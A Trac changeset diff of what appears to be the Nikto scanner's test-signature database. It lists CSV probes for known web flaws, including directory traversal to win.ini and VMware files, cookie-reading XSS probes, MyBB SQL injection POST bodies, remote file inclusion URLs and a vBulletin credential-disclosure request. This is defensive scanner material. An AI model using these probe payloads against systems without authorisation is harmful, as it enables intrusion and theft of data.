"003376","783","36","/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa","GET","OBJECT RUNAT=Server","","","","","ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp","","" … … 3377 3377 "003379","789","5","/iissamples/sdk/asp/docs/codebrws.asp","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CVE-1999-0739. MS99-013.","","" 3378 3378 "003380","789","5","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. CVE-1999-0739. MS99-013.","","" 3379 "003381","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","GET"," [windows]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","",""3380 "003382","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET"," [fonts]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","",""3381 "003383","96","7","/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET"," [fonts]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""3382 "003384","96","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET"," [fonts]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""3379 "003381","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","GET","\[windows\]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","","" 3380 "003382","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","\[fonts\]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","","" 3381 "003383","96","7","/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","","" 3382 "003384","96","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","","" 3383 3383 "003385","9624","3","/pass_done.php","GET","200","","","","","PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.","","" 3384 3384 "003386","9624","a","/admin/admin.php?adminpy=1","GET","200","","","","","PY-Membres 4.2 may allow administrator access.","","" 3385 3385 "003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with url= variable.","","" 3386 3386 "003388","9695","3","/servlet/SnoopServlet","GET","Client Information","","","","","JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.","","" 3387 "003389","3268","2","/Citrix/PNAgent/","GET"," index of ","","","","","Directory indexing found.","",""3388 "003390","3268","2","/Citrix/ICAWEB/","GET"," index of ","","","","","Directory indexing found.","",""3389 "003391","3268","2","/IBMWebAS/","GET"," index of ","","","","","Directory indexing found.","",""3390 "003392","3268","2","/IBMWebAS/docs/","GET"," index of ","","","","","Directory indexing found.","",""3387 "003389","3268","2","/Citrix/PNAgent/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3388 "003390","3268","2","/Citrix/ICAWEB/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3389 "003391","3268","2","/IBMWebAS/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3390 "003392","3268","2","/IBMWebAS/docs/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3391 3391 "003393","3233","1","/IBMWebAS/apidocs/","GET","IBM WebSphere","","","","","IBM Websphere documentation found.","","" 3392 3392 "003394","3233","1","/IBMWebAS/configDocs/","GET","WebSphere Configuration","","","","","IBM Websphere documentation found.","","" 3393 "003395","3268","2","/IBMWebAS/mbeanDocs/","GET"," index of ","","","","","Directory indexing found. IBM Websphere documentation.","",""3393 "003395","3268","2","/IBMWebAS/mbeanDocs/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. IBM Websphere documentation.","","" 3394 3394 "003396","3092","1","/iishelp/iis/misc/default.asp","GET","Microsoft Internet Information Services","","","","","Default IIS page found.","","" 3395 3395 "003397","3092","1","/Citrix/MetaFrameXP/default/login.asp","GET","MetaFrame XP","","","","","Citrix MetaFrame login.","","" … … 3406 3406 "003408","3092","1","/soapdocs/webapps/soap/","GET","Oracle SOAP","","","","","Oracle SOAP application.","","" 3407 3407 "003409","3092","1","/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml","GET","SOAP configuration file","","","","","SOAP server configuration file.","","" 3408 "003410","20954","4","/shopadmin.asp?Password=abc&UserName=\"><script>alert(foo)</script>","GET","<script>alert (foo)</script>","","","","","VP-ASP Shopping Cart 5.50 shopadmin.asp UserName Variable XSS.","",""3409 "003411","20406","4","/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>","GET","<script>alert (document.cookie);</script>","","","","","PHP contains a flaw that allows a remote cross site scripting attack.","",""3410 "003412","24484","4","/phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>","GET","<script>alert (foo)</script>","","","","","PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS","",""3408 "003410","20954","4","/shopadmin.asp?Password=abc&UserName=\"><script>alert(foo)</script>","GET","<script>alert\(foo\)<\/script>","","","","","VP-ASP Shopping Cart 5.50 shopadmin.asp UserName Variable XSS.","","" 3409 "003411","20406","4","/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","PHP contains a flaw that allows a remote cross site scripting attack.","","" 3410 "003412","24484","4","/phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>","GET","<script>alert\(foo\)<\/script>","","","","","PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS","","" 3411 3411 "003413","3233","1","/j2ee/","GET","200","","","","","j2ee directory found--possibly an Oracle app server directory.","","" 3412 3412 "003414","3233","3","@CGIDIRSprintenv.tmp","GET","DOCUMENT_ROOT","","","","","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.","","" … … 3486 3486 "003488","3092","3","/cehttp/property/","GET","200","","","","","Sterling Commerce Connect Direct configuration files.","","" 3487 3487 "003489","3092","b","/webdav/index.html","GET","WebDAV support","","","","","WebDAV support is enabled.","","" 3488 "003490","3268","2","/hp-ux/","GET"," index of ","","","","","Directory indexing found.","",""3488 "003490","3268","2","/hp-ux/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3489 3489 "003491","3092","13b","/hp_docs/","GET","web server suite","","","","","HP-UX Web Server Suite was found.","","" 3490 3490 "003492","3092","13b","/hp_docs/cgi-bin/index.cgi","GET","web server suite","","","","","HP-UX Web Server Suite was found.","","" 3491 "003493","3268","2","/hp_docs/xmltools/","GET"," index of ","","","","","Directory indexing found. HP-UX Web Server Suite xml tools.","",""3491 "003493","3268","2","/hp_docs/xmltools/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP-UX Web Server Suite xml tools.","","" 3492 3492 "003494","3092","3","@CGIDIRSshowuser.cgi","GET","Username","","","","","Shows the output of the 'whoami' command, which shows the web server user.","","" 3493 3493 "003495","3092","1","@CGIDIRSman2html","GET","manual page","","","","","Gateway to Unix man pages.","","" 3494 3494 "003496","3092","3","/status?full=true","GET","Tomcat Status","","","","","Apache Tomcat and/or JBoss information page.","","" 3495 "003497","35935","4","/rpc.php?q=\"><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable.","",""3495 "003497","35935","4","/rpc.php?q=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable.","","" 3496 3496 "003499","35933","9","/db.php?q='&t='","GET","MySQL server version","","","","","Unobtrusive Ajax Star Rating Bar db.php is vulnerable to SQL injection in the q and t variables.","","" 3497 3497 "003500","35934","9","/rpc.php?q='&t='","GET","MySQL server version","","","","","Unobtrusive Ajax Star Rating Bar rpc.php is vulnerable to SQL injection in the q and t variables.","","" … … 3501 3501 "003504","3233","3b","/nps/version.jsp","GET","200","","","","","Novell iManager version found.","","" 3502 3502 "003505","3233","3b","/nps/servlet/webacc?taskId=dev.Empty&merge=fw.About","GET","200","","","","","Novell iManager version found.","","" 3503 "003506","3268","2","/doc/Judy/demo/","GET"," index of ","","","","","Directory indexing found. HP Judy language demos.","",""3504 "003508","3268","2","/doc/vxvm/","GET"," index of ","","","","","Directory indexing found. HP help documentation.","",""3503 "003506","3268","2","/doc/Judy/demo/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP Judy language demos.","","" 3504 "003508","3268","2","/doc/vxvm/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP help documentation.","","" 3505 3505 "003509","3233","2","/doc/PRINTER-JPN-S","GET","HPDPS","","","","","HP DPS","","" 3506 3506 "003510","3233","2","/doc/PRINTER-JPN-E","GET","HPDPS","","","","","HP DPS","","" … … 3522 3522 "003526","3233","2","/doc/11iRelNotes.html","GET","Release Notes","","","","","HP server documentation.","","" 3523 3523 "003527","3233","2","/doc/11.00RelNotes","GET","Release Notes","","","","","HP server documentation.","","" 3524 "003528","3268","2","/doc/Judy/","GET"," index of ","","","","","Directory indexing found. HP server Judy documentation.","",""3525 "003529","3268","2","/doc/TechPrtServ/","GET"," index of ","","","","","Directory indexing found. HP Documentation.","",""3524 "003528","3268","2","/doc/Judy/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP server Judy documentation.","","" 3525 "003529","3268","2","/doc/TechPrtServ/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP Documentation.","","" 3526 3526 "003530","3233","2","/doc/sw_patches.txt","GET","HP 9000 Series","","","","","HP server documentation.","","" 3527 3527 "003531","3233","2","/doc/Judy/COPYRIGHT","GET","Trademark Notice","","","","","HP server documentation.","","" … … 3535 3535 "003539","3233","2","/doc/Judy/LICENSE","GET","Software License","","200","","","HP server Judy documentation.","","" 3536 3536 "003540","3233","2","/doc/Judy/demo/JudySort.c","GET","static char","","","","","HP server Judy code.","","" 3537 "003541","3233","2","/doc/Judy/demo/Makefile","GET","libJudy .a","","","","","HP server Judy code.","",""3537 "003541","3233","2","/doc/Judy/demo/Makefile","GET","libJudy\.a","","","","","HP server Judy code.","","" 3538 3538 "003542","3233","2","/doc/Judy/demo/funhist.c","GET","FUNCTION HISTOGRAM","","","","","HP server Judy code.","","" 3539 3539 "003543","3233","2","/doc/Judy/demo/interSL.c","GET","INTERACTIVE JUDYSL","","","","","HP server Judy code.","","" … … 3551 3551 "003555","3092","1","/staging/","GET","200","","","","","This may be interesting...","","" 3552 3552 "003556","3092","1","/_archive/","GET","200","","","","","Archive found.","","" 3553 "003557","3268","12","/pdfs/","GET"," index of ","","","","","Directory indexing found.","",""3553 "003557","3268","12","/pdfs/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3554 3554 "003558","3093","0","@FCKEDITOReditor/filemanager/upload/test.html","GET","Custom Uploader","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" 3555 3555 "003559","3093","0","@FCKEDITOReditor/dialog/fck_image.html","GET","Short Description","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" … … 3558 3558 "003562","3093","0","@FCKEDITOReditor/dialog/fck_link.html","GET","Link Properties","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" 3559 3559 "003563","3093","0","@FCKEDITOReditor/filemanager/browser/default/connectors/asp/connector.asp","GET","text editor for","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" 3560 "003564","3268","2","/crm/","GET"," index of ","","","","","Directory indexing found.","",""3561 "003565","3268","2","/static/","GET"," index of ","","","","","Directory indexing found.","",""3562 "003566","3268","2","/w3c/","GET"," index of ","","","","","Directory indexing found.","",""3563 "003567","3268","2","/dynamic/","GET"," index of ","","","","","Directory indexing found.","",""3560 "003564","3268","2","/crm/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3561 "003565","3268","2","/static/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3562 "003566","3268","2","/w3c/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3563 "003567","3268","2","/dynamic/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 3564 3564 "003568","3233","b","/update.php","GET","access_check","","","","","Drupal's update.php was found.","","" 3565 3565 "003569","3092","1","/INSTALL.txt","GET","200","","","","","Default file found.","","" … … 3580 3580 "003584","3233","b","/icons/README","GET","Public Domain Icons","","","","","Apache default file found.","","" 3581 3581 "003585","3092","b","/localstart.asp","GET","Object moved","","","","","Default IIS install page found.","","" 3582 "003586","0","b","/ampache/update.php","GET","Ampache Update","","","","","Ampache update page is visible.","","" 3583 "003587","0","b","/ampache/login.php","GET","Ampache :: Pour l 'Amour de la Musique","","","","","Ampache is installed.","",""3582 "003586","0","b","/ampache/update.php","GET","Ampache Update","","","","","Ampache update page is visible.","","" 3583 "003587","0","b","/ampache/login.php","GET","Ampache :: Pour l\'Amour de la Musique","","","","","Ampache is installed.","","" 3584 3584 "003588","0","b","/ampache/docs/README","GET","README - Ampache","","","","","Ampache installation documents found.","","" 3585 "003589","0","b","/cgi-bin/webcgi/about","GET"," /cgi/locale/about_en.xsl","","","","","Host seems to be a Dell Remote Access Controller (RAC).","",""3585 "003589","0","b","/cgi-bin/webcgi/about","GET","\/cgi\/locale\/about_en\.xsl","","","","","Host seems to be a Dell Remote Access Controller (RAC).","","" 3586 3586 "003590","0","b","/webservices/IlaWebServices","GET","200","","","","","Host has the Oracle iLearning environment installed.","","" 3587 3587 "003591","0","a","/SoundBridgeStatus.html","GET","200","","SoundBridge is running software version","","","Host is running the SoundBridge web server which doesn't support identification.","","" 3588 "003592","54339","4b","@CGIDIRSFormMail.pl","GET","Version 1 .92","","","","","Matt Wright's FormMail 1.92 is vulnerable to HTTP response splitting and Cross-Site Scripting","",""3588 "003592","54339","4b","@CGIDIRSFormMail.pl","GET","Version 1\.92","","","","","Matt Wright's FormMail 1.92 is vulnerable to HTTP response splitting and Cross-Site Scripting","","" 3589 3589 "003592","0","b","/CFIDE/componentutils/cfcexplorer.cfc","GET","Component Browser Login","","","","","ColdFusion Component Browser. Default password may be 'admin'.","","" 3590 3590 "003593","0","1","/phone/","GET","200","","","","","This may be interesting...","","" 3591 3591 "003594","0","b","/Host/Portals/tabid/19/ctl/Login/portalid/0/Default.aspx","GET","dnn_ctr-1_Signin_txtUsername","","","","","DotNetNuke is running on the web server.","","" 3592 "003595","34879","24","/jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert('nikto')</script>","GET","200","<script>alert ('nikto')</script>","","","","The tomcat demo files are installed, which are vulnerable to an XSS attack","",""3593 "003596","34878","24","/jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert('nikto')</script>","GET","200","<script>alert ('nikto')</script>","","","","The tomcat demo files are installed, which are vulnerable to an XSS attack","",""3594 "003597","12721","24","/jsp-examples/jsp2/el/functions.jsp?foo=<script>alert('nikto')</script>","GET","200","<script>alert ('nikto')</script>","","","","The Tomcat demo files are installed, which are vulnerable to an XSS attack","",""3595 "003598","0","b","/aspnet_files/","GET","403"," Index of ","","","",".NET client side script files indicate .NET may be running. See http://msdn.microsoft.com/en-us/library/aa479045.aspx#aspplusvalid_clientside","",""3592 "003595","34879","24","/jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert('nikto')</script>","GET","200","<script>alert\('nikto'\)<\/script>","","","","The tomcat demo files are installed, which are vulnerable to an XSS attack","","" 3593 "003596","34878","24","/jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert('nikto')</script>","GET","200","<script>alert\('nikto'\)<\/script>","","","","The tomcat demo files are installed, which are vulnerable to an XSS attack","","" 3594 "003597","12721","24","/jsp-examples/jsp2/el/functions.jsp?foo=<script>alert('nikto')</script>","GET","200","<script>alert\('nikto'\)<\/script>","","","","The Tomcat demo files are installed, which are vulnerable to an XSS attack","","" 3595 "003598","0","b","/aspnet_files/","GET","403","[Ii]ndex [Oo]f ","","","",".NET client side script files indicate .NET may be running. See http://msdn.microsoft.com/en-us/library/aa479045.aspx#aspplusvalid_clientside","","" 3596 3596 "003599","3092","1","/Admin/","GET","200","Directory Listing Denied","","","","This might be interesting...","","" 3597 3597 "003600","3092","1","/af/","GET","200","","","","","This might be interesting... potential country code (Afghanistan)","","" … … 6175 6175 "006180","5292","c","/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","","" 6176 6176 "006181","0","3","/wp-content/plugins/akismet/readme.txt","GET","Tested up to","","","","","The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version","","" 6177 "006182","62684","3","/wp-content/plugins/hello.php","GET","Call to undefined function add_action () in ","","","","","The WordPress hello.php plugin reveals a file system path","",""6177 "006182","62684","3","/wp-content/plugins/hello.php","GET","Call to undefined function add_action\(\) in ","","","","","The WordPress hello.php plugin reveals a file system path","","" 6178 6178 "006183","0","3","/readme.html","GET","Version ","","5-minute install","","","This WordPress file reveals the installed version.","","" 6179 "006184","0","3","/wp-links-opml.php","GET","generator=\"WordPress /","","","","","This WordPress script reveals the installed version.","",""6180 "006184","3093","1","/includes/db.inc","GET","200","< ?php","","","","Include files (.inc) should not be served in plain text.","",""6181 "006185","3093","1","/includes/sendmail.inc","GET","200","< ?php","","","","Include files (.inc) should not be served in plain text.","",""6179 "006184","0","3","/wp-links-opml.php","GET","generator=\"WordPress\/","","","","","This WordPress script reveals the installed version.","","" 6180 "006184","3093","1","/includes/db.inc","GET","200","<\?php","","","","Include files (.inc) should not be served in plain text.","","" 6181 "006185","3093","1","/includes/sendmail.inc","GET","200","<\?php","","","","Include files (.inc) should not be served in plain text.","","" 6182 6182 "006186","3092","1b","/license.txt","GET","200","","","","","License file found may identify site software.","","" 6183 6183 "006187","3092","1b","/install.txt","GET","200","","","","","Install file found may identify site software.","","" … … 6189 6189 "006193","58472","3","/read/rss?forum=nonexistant&rev=0.92","GET","no such element in array","","","","","Lyris ListManager error information disclosure.","","" 6190 6190 "006194","58472","3","/subscribe/survey~1.tml","GET","Database error inf","","","","","Lyris ListManager error information disclosure.","","" 6191 "006195","58463","4","/scripts/message/message_dialog.tml?how_many_back=\"><script>alert(1)</script>","GET","<script>alert (1)</script>","","","","","Lyris ListManager Cross-Site Scripting.","",""6192 "006196","58464","04","/read/attach_file.tml?page=http://cirt.net/","GET","action=\"http: //cirt.net","","","","","Lyris ListManager XSRF/File Upload.","",""6191 "006195","58463","4","/scripts/message/message_dialog.tml?how_many_back=\"><script>alert(1)</script>","GET","<script>alert\(1\)<\/script>","","","","","Lyris ListManager Cross-Site Scripting.","","" 6192 "006196","58464","04","/read/attach_file.tml?page=http://cirt.net/","GET","action=\"http:\/\/cirt\.net","","","","","Lyris ListManager XSRF/File Upload.","","" 6193 6193 "006197","0","23","/config/config.txt","GET","200","","","","","Configuration file found.","","" 6194 6194 "006198","0","23","/htaccess.txt","GET","RewriteEngine On","","","","","Default Joomla! htaccess.txt file found. This should be removed or renamed.","","" 6195 6195 "006199","0","1b","/typo3/","GET","200","","c-password","","","Typo3 login found","","" 6196 "006200","0","12","@CGIDIRSphp.ini","GET"," [PHP]","","","","","php.ini file found","",""6196 "006200","0","12","@CGIDIRSphp.ini","GET","\[PHP\]","","","","","php.ini file found","","" 6197 6197 "006201","0","3","/ConversionReport.txt","GET","This report shows","","","","","A report file from an ASP.NET 1.1 conversion to an ASP.NET 2.0 project was found and may reveal sensitive information.","","" 6198 6198 "006202","0","b","/cadence/","GET","Cadre Technologies","","","","","Cadre Technologies Cadence WebAccess was found.","","" … … 6204 6204 "006209","0","2","/uploads/readme.txt","GET","200","","","","","Readme file found.","","" 6205 6205 "006210","0","b","/cadence/help/help.htm","GET","Cadre Technologies","","","","","Cadre Technologies Cadence WebAccess help files found.","","" 6206 "006211","0","b","/","GET","img src=\"welcome .png\" alt=\"IIS7\"","","","","","Appears to be a default IIS 7 install.","",""6207 "006212","0","3","/install/install.aspx","GET","dtsoftware Configuration","","","","","dtsoftware 404 page reveals detailed application information.","",""6208 "006213","0","23","/webresource.axd?d=junk","GET","NET Framework Version:","","Invalid viewstate ."","","ASP.NET reveals its version in error messages when verbose debugging is enabled.","",""6209 "006214","0","23","/scriptresource.axd?d=junk","GET","NET Framework Version:","","Invalid viewstate .","","","ASP.NET reveals its version in error messages when verbose debugging is enabled.","",""6206 "006211","0","b","/","GET","img src=\"welcome\.png\" alt=\"IIS7\"","","","","","Appears to be a default IIS 7 install.","","" 6207 "006212","0","3","/install/install.aspx","GET","dtsoftware\ Configuration","","","","","dtsoftware 404 page reveals detailed application information.","","" 6208 "006213","0","23","/webresource.axd?d=junk","GET","NET Framework Version:","","Invalid viewstate\.","","","ASP.NET reveals its version in error messages when verbose debugging is enabled.","","" 6209 "006214","0","23","/scriptresource.axd?d=junk","GET","NET Framework Version:","","Invalid viewstate\.","","","ASP.NET reveals its version in error messages when verbose debugging is enabled.","","" 6210 6210 "006215","0","1","/admin1.php","GET","200","","","","","Admin login page found.","","" 6211 6211 "006217","0","1","/admin.asp","GET","200","","","","","Admin login page/section found.","","" … … 6423 6423 "006431","0","1","/maint.aspx","GET","200","","","","","This might be interesting...","","" 6424 6424 "006432","59440","57","/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml","GET","200","","","","","VMWare ESX is vulnerable to a directory traversal attack.","","" 6425 "006433","39003","4","/","<script>alert(1)</script>","413","","<script>alert (1)</script>","","","Apache HTTP Server 2.0.x and 2.2.x<script>alert(1)</script>","",""6425 "006433","39003","4","/","<script>alert(1)</script>","413","","<script>alert\(1\)<\/script>","","","Apache HTTP Server 2.0.x and 2.2.x<script>alert(1)</script>","","" 6426 6426 "006434","0","3","/jk-status","GET","200","","","","","mod_jk status page is visible.","","" 6427 6427 "006435","0","3","/balancer-manager","GET","200","","","","","mod_proxy_balancer management page is visible.","","" … … 6432 6432 "006441","0","2","@CGIDIRSawredir.pl","GET","200","","","","","AWStats redirection file.","","" 6433 6433 "006442","0","1","/help.php","GET","200","","","","","A help file was found.","","" 6434 "006443","0","b","/wordpress/","GET"," /wp-content/","","","","","A Wordpress installation was found.","",""6435 "006445","66505","3","/forum/faq.php?s=&do=search&q=database&match=all&titlesonly=0","GET","Database< /span> Name:","","","","","vBulletin 3.6.8 contains a vulnerability that reveals the database credentials via a FAQ search. See http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1","",""6436 "006446","66505","3","/faq.php?s=&do=search&q=database&match=all&titlesonly=0","GET","Database< /span> Name:","","","","","vBulletin 3.6.8 contains a vulnerability that reveals the database credentials via a FAQ search. See http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1","",""6434 "006443","0","b","/wordpress/","GET","\/wp-content\/","","","","","A Wordpress installation was found.","","" 6435 "006445","66505","3","/forum/faq.php?s=&do=search&q=database&match=all&titlesonly=0","GET","Database<\/span> Name:","","","","","vBulletin 3.6.8 contains a vulnerability that reveals the database credentials via a FAQ search. See http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1","","" 6436 "006446","66505","3","/faq.php?s=&do=search&q=database&match=all&titlesonly=0","GET","Database<\/span> Name:","","","","","vBulletin 3.6.8 contains a vulnerability that reveals the database credentials via a FAQ search. See http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1","","" 6437 6437 "006447","0","2b","/wconnect/admin.html","GET","e-SPS Web","","","","","American Software e-SPS admin section found.","","" 6438 6438 "006448","0","18","/open.txt","GET","Fx29ID","","","","","Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.","","" … … 6442 6442 "006452","0","b","/gif/tricolor_ink_guage.gif","GET","200","","","","","This device may be an HP printer/scanner and allow retrieval of previously scanned images.","","" 6443 6443 "006453","0","b1","/logon/logonServlet","GET","User Management","","","","","SAP NetWeaver admin interface found.","","" 6444 "006454","0","3","/AdobeDocumentServicesSec/Config/bindings?wsdl&style=http","GET","><b>  The file:","","does not exist","","","SAP J2EE server reveals the disk path with certain invalid requests.","",""6445 "006455","0","23","/services","GET","And now ... Some Services","","","","","Axis web services reveals information about all installed web services. See http://ws.apache.org/axis/java/security.html to secure Axis.","",""6444 "006454","0","3","/AdobeDocumentServicesSec/Config/bindings?wsdl&style=http","GET","><b>\ \ The file:","","does not exist","","","SAP J2EE server reveals the disk path with certain invalid requests.","","" 6445 "006455","0","23","/services","GET","And now\.\.\. Some Services","","","","","Axis web services reveals information about all installed web services. See http://ws.apache.org/axis/java/security.html to secure Axis.","","" 6446 6446 "006456","0","23","/happyaxis.jsp","GET","Examining webapp configuration","","","","","Axis file reveals sensitive information about the Axis installation components. See http://ws.apache.org/axis/java/security.html to secure Axis.","","" 6447 6447 "006457","0","2","/apidocs/index.html","GET","designed to be viewed using the frames","","","","","SAP J2EE Engine help.","","" … … 6466 6466 "006475","0","2","/j2ee/examples/jsp/","GET","This is a collection","","","","","Oracle j2ee example JSP pages.","","" 6467 6467 "006476","3092","1","/messages/","GET","200","","","","","This might be interesting...","","" 6468 "006477","0","23","@CRYSTALREPORTSviewrpt.cwr?id=1&wid=1&apstoken=127.0.0.2:0@111","GET","Server 127 .0.0.2:0 not found","","","","","Crystal Reports can be used to scan internal hosts. See http://tinyurl.com/2f4r2o9","",""6468 "006477","0","23","@CRYSTALREPORTSviewrpt.cwr?id=1&wid=1&apstoken=127.0.0.2:0@111","GET","Server 127\.0\.0\.2:0 not found","","","","","Crystal Reports can be used to scan internal hosts. See http://tinyurl.com/2f4r2o9","","" 6469 6469 "006478","0","b","/console-selfservice/","GET","console header","","","","","RSA Self-Service Console found","","" 6470 6470 "006479","68662","8","/axis2/axis2-web/HappyAxis.jsp","GET","Axis2 Happiness Page","","","","","SAP BusinessObjects dswsbobje.war deploys Axis2 with a static admin password. See http://www.rapid7.com/security-center/advisories/R7-0037.jsp","","" 6471 "006480"," 70013","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBB 1.6 contains an SQL Injection in the keywords parameter of search.php. See http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""6472 "006481"," 70014","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBBx 1.6 contains an SQL Injection in the keywords parameter of private.php. See http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""6471 "006480","0","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue\.","","","Sorry, but no results were returned","","MyBB 1.6 contains an SQL Injection in the keywords parameter of search.php. See http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1","" 6472 "006481","0","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue\.","","","Sorry, but no results were returned","","MyBBx 1.6 contains an SQL Injection in the keywords parameter of private.php. See http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""
Note: See TracChangeset
for help on using the changeset viewer.
